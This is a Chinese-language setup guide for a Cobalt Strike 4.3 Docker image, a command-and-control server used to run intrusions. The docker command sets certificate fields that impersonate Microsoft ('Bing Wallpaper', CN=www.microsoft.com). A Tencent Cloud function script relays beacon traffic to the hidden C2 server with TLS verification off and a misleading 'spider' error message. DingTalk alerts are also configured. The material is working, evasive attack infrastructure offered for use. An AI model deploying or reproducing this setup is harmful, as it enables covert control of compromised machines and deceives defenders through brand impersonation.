CobaltStrike4.3 特别供应版

安装说明

docker run -it \
--name cs \
-e "passwd=你的密码" \
-e "server_ip=你的服务器IP地址,可以是内网地址,比如10.0.4.6" \
-e "server_port=cs指定登陆端口" \
-e "aliasname=Bing Wallpaper" \
-e "dname=CN=www.microsoft.com, OU=Microsoft Corporation, O=Microsoft Corporation,
L=Redmond, S=WA, C=US" \
-p cs指定登陆端口:cs指定登陆端口 \
-p 云函数专用,可以是任意端口,后面443不可改变:443 \
-p 随意端口号:随意端口号 \
-p cs指定登陆端口:cs指定登陆端口/udp \
-p 云函数专用,可以是任意端口,后面443不可改变:443/udp \
-p 随意端口号:随意端口号/udp \
registry.cn-hangzhou.aliyuncs.com/xrsec/cobaltstrike:4.3-tgb
# 如果不需要云函数和钉钉推送请使用下面这个镜像
registry.cn-hangzhou.aliyuncs.com/xrsec/cobaltstrike:4.3

腾讯云专用配置文件

# -*- coding: utf8 -*-
import json, requests, base64, re, os, requests


def main_handler(event, context):
C2 = 'https://你的服务器IP地址:云函数设置的端口号'
path = event['path']
ip = event['requestContext']['sourceIp']
headers = event['headers']
headers['X-Forwarded-For'] = ip
print("############")
print("############")
print("############")
print("############")
print("############")
print("############")
try:
if event['httpMethod'] == 'GET':
resp = requests.get(C2 + path, headers=headers, verify=False)
print("############")
print("############")
print("############")
print("############")
print("############")
print("############")
else:
print("############")
print("############")
print("############")
print("############")
print("############")
print("############")
resp = requests.post(C2 + path, data=event['body'], headers=headers, verify=False)

except:
print("腾讯云蜘蛛抓取异常,请检查json数据接口")
print("############")
print("############")
print("############")
print("############")
print("############")
print("############")
response = {
"isBase64Encoded": True,
"statusCode": resp.status_code,
"headers": dict(resp.headers),
"body": str(base64.b64encode(resp.content))[2:-1]
}
return response

DingTalk

docker exec -it cs bash
vi /cobaltstrike/dingding.cna

截图

image-20210509201049871

image-20210509201126652

tips

有问题,多交流